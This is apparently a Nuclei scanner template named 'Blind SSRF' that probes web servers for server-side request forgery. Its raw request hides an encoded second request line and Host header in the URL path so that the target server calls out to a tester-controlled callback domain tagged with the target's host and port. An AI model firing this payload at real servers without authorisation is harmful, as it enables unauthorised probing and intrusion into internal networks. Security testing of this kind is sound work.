id: 0x090

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
    - |+
      GET /%20HTTP/1.1%3F%0DHost:%20{{Host}}.{{Port}}.BSSRF-090.{{MY-DOMAIN}}%3F%0D%3F%0D HTTP/1.1
      Host: {{Hostname}}
      User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
      Cache-Control: no-transform
      Accept-Encoding: gzip, deflate
      Accept: */*

    unsafe: true
    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
